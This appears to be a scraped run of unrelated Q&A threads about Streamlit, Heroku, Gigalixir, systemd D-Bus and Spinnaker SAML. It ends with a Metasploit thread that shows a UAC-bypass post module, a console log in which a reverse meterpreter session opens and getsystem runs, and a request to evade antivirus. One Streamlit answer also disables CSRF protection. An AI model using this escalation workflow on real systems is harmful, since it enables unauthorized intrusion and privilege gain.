I have a setup.sh file :
mkdir -p ~/.streamlit/
echo "\
[server]\n\
port=$PORT\n\
enableCORS=false\n\
headless=true\n\
\n\
" > ~/.streamlit/config.toml
When i deploy my app on Heroku : It gives Application error H14, while in my logs I can see a small overriding done:
2022-06-28T13:59:07.660953+00:00 heroku[wev.1]: Restarting
2022-06-28T13:59:07.663151+00:00 heroku[wev.1]: State changed from up to starting
2022-06-28T13:59:08.426158+00:00 heroku[wev.1]: Stopping all processes with SIGTERM
2022-06-28T13:59:08.470430+00:00 app[wev.1]: Stopping...
2022-06-28T13:59:08.740844+00:00 heroku[wev.1]: Process exited with status 0
2022-06-28T13:59:17.236832+00:00 heroku[wev.1]: Starting process with command `sh setup.sh && streamlit run app.py`
2022-06-28T13:59:17.842753+00:00 heroku[wev.1]: State changed from starting to up
2022-06-28T13:59:19.208294+00:00 app[wev.1]: 2022-06-28 13:59:19.208
2022-06-28T13:59:19.208305+00:00 app[wev.1]: Warning: the config option 'server.enableCORS=false' is not compatible with 'server.enableXsrfProtection=true'.
2022-06-28T13:59:19.208305+00:00 app[wev.1]: As a result, 'server.enableCORS' is being overridden to 'true'.
2022-06-28T13:59:19.208306+00:00 app[wev.1]:
2022-06-28T13:59:19.208306+00:00 app[wev.1]: More information:
2022-06-28T13:59:19.208307+00:00 app[wev.1]: In order to protect against CSRF attacks, we send a cookie with each request.
2022-06-28T13:59:19.208308+00:00 app[wev.1]: To do so, we must specify allowable origins, which places a restriction on
2022-06-28T13:59:19.208308+00:00 app[wev.1]: cross-origin resource sharing.
2022-06-28T13:59:19.208308+00:00 app[wev.1]:
2022-06-28T13:59:19.208309+00:00 app[wev.1]: If cross origin resource sharing is required, please disable server.enableXsrfProtection.
2022-06-28T13:59:19.208309+00:00 app[wev.1]:
2022-06-28T13:59:19.414636+00:00 app[wev.1]:
2022-06-28T13:59:19.414646+00:00 app[wev.1]: You can now view your Streamlit app in your browser.
2022-06-28T13:59:19.414656+00:00 app[wev.1]:
2022-06-28T13:59:19.414692+00:00 app[wev.1]: Network URL: http://172.19.20.38:24743
2022-06-28T13:59:19.414722+00:00 app[wev.1]: External URL: http://3.235.143.6:24743
2022-06-28T13:59:19.414734+00:00 app[wev.1]:
While running, it is overriding my enableCORS=false to true, I think which is causing my application error.
I have previously posted doubt related to "Application error" : Heroku app Application error even after successful deployment message
Do check it for setup.sh and Procfile details.
How can I disable the XsrfProtection??
Per the error, server.enableCORS=false is being overridden because server.enableXsrfProtection is set to true. The solution is to set server.enableXsrfProtection=false:
mkdir -p ~/.streamlit/
echo "
[server]
port=$PORT
enableXsrfProtection=false
enableCORS=false
headless=true
" > ~/.streamlit/config.toml
I am also obliged to note what this setting is protecting against, but assume you are familiar with the risks of toggling it off.
Related
I have installed streamlit on my Mac with pdm and launched the command streamlit hello to view the demos. The command returns the following:
❯ pdm run streamlit hello
2022-03-21 11:43:45.812 WARNING streamlit.config:
Warning: the config option 'server.enableCORS=false' is not compatible with 'server.enableXsrfProtection=true'.
As a result, 'server.enableCORS' is being overridden to 'true'.
More information:
In order to protect against CSRF attacks, we send a cookie with each request.
To do so, we must specify allowable origins, which places a restriction on
cross-origin resource sharing.
If cross origin resource sharing is required, please disable server.enableXsrfProtection.
2022-03-21 11:43:45.816 DEBUG streamlit.logger: Initialized tornado logs
2022-03-21 11:43:45.818 DEBUG matplotlib.pyplot: Loaded backend agg version unknown.
2022-03-21 11:43:45.819 DEBUG streamlit.bootstrap: Setting up signal handler
2022-03-21 11:43:45.819 DEBUG asyncio: Using selector: KqueueSelector
2022-03-21 11:43:45.827 DEBUG streamlit.server.server: Starting server...
2022-03-21 11:43:45.827 DEBUG streamlit.server.server: Serving static content from the Node dev server
2022-03-21 11:43:45.830 DEBUG streamlit.server.server: Server started on port 8501
2022-03-21 11:43:45.831 DEBUG streamlit.server.server: Server state: State.INITIAL -> State.WAITING_FOR_FIRST_BROWSER
2022-03-21 11:43:46.029 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.041 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.054 DEBUG git.cmd: Popen(['git', 'version'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
2022-03-21 11:43:46.066 DEBUG git.cmd: Popen(['git', 'rev-parse', '--show-toplevel'], cwd=<my/working/directory>, universal_newlines=False, shell=None, istream=None)
Welcome to Streamlit. Check out our demo in your browser.
Local URL: http://localhost:3000
Network URL: http://192.168.1.117:3000
Ready to create your own Python apps super quickly?
Head over to https://docs.streamlit.io
May you create awesome apps!
However, when I connect to the local URL, the connection is rejected:
I tried switching to Brave Browser and Firefox, but I got the same error.
From other SO questions, I tried the following:
❯ apachectl configtest
AH00557: httpd: apr_sockaddr_info_get() failed for Lucas-MacBook-Air.local
AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message
Syntax OK
I also ran this:
ps -ax | grep 'httpd'
124 ?? 0:00.85 /usr/sbin/httpd -D FOREGROUND
517 ?? 0:00.00 /usr/sbin/httpd -D FOREGROUND
6627 ttys002 0:00.01 grep httpd
I tried launching other stuff that creates a local server, e.g. Jupyter Notebooks, and they work.
The problem is known: streamlit does not support pdm at the time of writing, as mentioned by #cye18 on the parallel issue opened on pdm's github page.
The problem is that, while streamlit configs default to server port 8501, the server is launched on the port 3000. You can force this behaviour in two ways.
The first is by manually changing streamlit's settings, which lies in ~/.streamlit/config.toml or locally in your project directory.
[server]
serverPort = 8501
Alternatively, you can add the following flag to the streamlit command when launching it:
pdm run streamlit run app.py --server.port 8501
Either way, streamlit will complain by saying that server.port does not work when global.developmentMode is true. Once again, this can be solved by adding the flag --global.developmentMode false. The final command will look like this: pdm run streamlit run app.py --server.port 8501 --global.developmentMode false.
Alternatively, the local settings will look like the following:
[server]
port = 8501
[global]
developmentMode = false
I am trying to deploy Hashrockets TIL Phoenix App to Gigalixir.
This is what I get after push to Gigalixir:
2020-08-23T05:58:55.071975+00:00 til[gigalixir-run]: Attempting to start 'til' on host 'til-6c4c5d7854-ddpfh'
2020-08-23T05:58:55.071987+00:00 til[gigalixir-run]: Attempting health checks on port 4000
2020-08-23T05:58:55.874467+00:00 til[til-6c4c5d7854-ddpfh]: web.1 | started with pid 49
2020-08-23T05:58:57.568099+00:00 til[til-6c4c5d7854-ddpfh]: web.1 | No file named server#127.0.0.1
2020-08-23T05:58:57.976006+00:00 til[til-6c4c5d7854-ddpfh]: web.1 | exited with code 1
2020-08-23T05:58:57.976034+00:00 til[til-6c4c5d7854-ddpfh]: system | sending SIGTERM to all processes
I cannot make sense of the error message No file named server#127.0.0.1. What can I do now?
The reason for this problem is, that the Procfile coming with the project is probably meant to be used with Heroku and contains
web: MIX_ENV=prod elixir --cookie $OTP_COOKIE --name server#127.0.0.1 --erl '-kernel inet_dist_listen_min 9000' --erl '-kernel inet_dist_listen_max 9000' -S mix phx.server
Renaming the file to Procfile.disabled and thus making Gigalixir use its default Procfile solves this problem.
In my service configuration TimeoutStartSec == 100s.
According to man page.. my Application need to notify to systemD sd_notify(READY=1) during <100s. If not service is put into failed state.
https://www.freedesktop.org/software/systemd/man/systemd.service.html
But in case of i want to do something ( eg just print out some log said : startup is not done in time ) . before my service is actually set to failed state .
Is there any change to do that...
My idea is create a timer which have same value with TimeoutStartSec == xx s
then i can manage to do something before timer expired.
But the question is TimeoutStartSec == xx is dynamicaly configured by user - in my project..
So i would expect some Dbus interface which will offer to read TimeoutStartSec from my application...
I checked
https://www.freedesktop.org/wiki/Software/systemd/dbus/
but did not found a corresponding property.
I am using systemD on Linux which freely use systemD Dbus interfaces.
I found solution .
SystemD actually provide that info
dbus-send --system --dest=org.freedesktop.systemd1 --print-reply /org/freedesktop/systemd1/unit/ServiceName_2eservice \
org.freedesktop.DBus.Properties.Get string:org.freedesktop.systemd1.Service string:TimeoutStartUSec
Note: your name of service need to modify to get exactly object path ServiceName.service adapt to ServiceName_2eservice
Scenerio:
Upgraded Spinnaker to 1.12.0. No other config changes that would impact this integration (we had to modify an s3 IAM because it quit working). Okta integration stopped working. Public key was reissued during install process for the ingress, may be relevant?
SAML-TRACE shows payload getting to okta and back
Spinnaker throws two different errors depending on browser and how I get there.
Direct link to deck url: (500) No IDP was configured, please update included metadata with at least one IDP (seen in browser and gate)
Okta "chicklet" in okta dashboard: (401) Authentication Failed: Incoming SAML message is invalid
Config details (again none of this changed):
Downloading metadata directly
JKS is being leveraged and is valid
service url is confirmed
alias for JKS is confirmed
I had this issue as well when upgrading from 1.10.13 to 1.12.2. I found lots of these error messages in Gate's logs:
2019-02-19 05:31:30.421 ERROR 1 --- [.0-8084-exec-10] o.a.c.c.C.[.[.[/].[dispatcherServlet] : Servlet.service() for servlet [dispatcherServlet] in context with path [] threw e
xception [org.opensaml.saml2.metadata.provider.MetadataProviderException: No IDP was configured, please update included metadata with at least one IDP] with root cause
org.opensaml.saml2.metadata.provider.MetadataProviderException: No IDP was configured, please update included metadata with at least one IDP
at org.springframework.security.saml.metadata.MetadataManager.getDefaultIDP(MetadataManager.java:795) ~[spring-security-saml2-core-1.0.2.RELEASE.jar:1.0.2.RELEASE]
at org.springframework.security.saml.context.SAMLContextProviderImpl.populatePeerEntityId(SAMLContextProviderImpl.java:157) ~[spring-security-saml2-core-1.0.2.RELEASE.jar
:1.0.2.RELEASE]
at org.springframework.security.saml.context.SAMLContextProviderImpl.getLocalAndPeerEntity(SAMLContextProviderImpl.java:127) ~[spring-security-saml2-core-1.0.2.RELEASE.ja
r:1.0.2.RELEASE]
at org.springframework.security.saml.SAMLEntryPoint.commence(SAMLEntryPoint.java:146) ~[spring-security-saml2-core-1.0.2.RELEASE.jar:1.0.2.RELEASE]
at org.springframework.security.web.access.ExceptionTranslationFilter.sendStartAuthentication(ExceptionTranslationFilter.java:203) ~[spring-security-web-4.2.9.RELEASE.jar
:4.2.9.RELEASE]
...
After downgrading back to 1.10.13, I upgraded to the next version, 1.11.0, and found that's when the issue started. Eventually, I looked at Gate's logs from the launch of the Container and found:
2019-02-20 22:31:40.132 ERROR 1 --- [0.0-8084-exec-3] o.o.s.m.provider.HTTPMetadataProvider : Error retrieving metadata from https://000000000000.okta.com/app/00000000000000000/sso/saml/metadata
javax.net.ssl.SSLException: Error in hostname verification
at org.opensaml.ws.soap.client.http.TLSProtocolSocketFactory.verifyHostname(TLSProtocolSocketFactory.java:241) ~[openws-1.5.4.jar:na]
at org.opensaml.ws.soap.client.http.TLSProtocolSocketFactory.createSocket(TLSProtocolSocketFactory.java:186) ~[openws-1.5.4.jar:na]
at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) ~[commons-httpclient-3.1.jar:na]
at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(HttpMethodDirector.java:387) ~[commons-httpclient-3.1.jar:na]
...
This lead me to realize that the TLS Certificate was being rejected by Gate. Not sure why it suddenly started failing the check. Up to this point, I had it configured as:
$ hal config security authn saml edit --metadata https://000000000000.okta.com/app/00000000000000000/sso/saml/metadata
I ended up downloading the metadata file and redeploying with halyard.
$ wget https://000000000000.okta.com/app/00000000000000000/sso/saml/metadata
$ hal config security authn saml edit --metadata "${PWD}/metadata"
$ hal config version edit --version 1.12.2
$ hal deploy apply
Opened up a private browser window as suggested by the Spinnaker documentation and Gate started redirecting to Okta correctly again.
Issue filed, https://github.com/spinnaker/spinnaker/issues/4017.
So I ended up finding the answer. The tomcat config changed apparently in spinnaker in later versions for gate.
I created this snippet in ~/.hal/default/profiles/gate-local.yml
server:
tomcat:
protocolHeader: X-Forwarded-Proto
remoteIpHeader: X-Forwarded-For
internalProxies: .*
Deployed spinnaker and it was back to working.
post/windows/escalate/bypassuac seems to fail for me
For some reason I can't get the post exploitation module bypassuac to work.
This is what I did:
Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
Put the session in background
Tried to use the post exploitation module like this:
use post/windows/escalate/bypassuac
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444 exploit
The port is not used yet so should be fine.
The output is as follows:
[-] Handler failed to bind to 192.168.1.100:4444
[] Started reverse handler on 0.0.0.0:4444
[] Starting the payload handler...
[] Uploading the bypass UAC executable to the filesystem...
[] Meterpreter stager executable 73802 bytes long being uploaded..
[] Uploaded the agent to the filesystem....
[] Post module execution completed
Then it returns to the console and does nothing, no new session, nothing whatsoever.
I checked the following things:
Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
Checked whether the virusscanner's alarm bells didn't ring from the executable. They didn't
Is there a way of manually running the executable and could someone explain me how that would work to open a new meterpreter session with SYSTEM level access?
Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.
Thanks in advance
Halvar
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…
meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo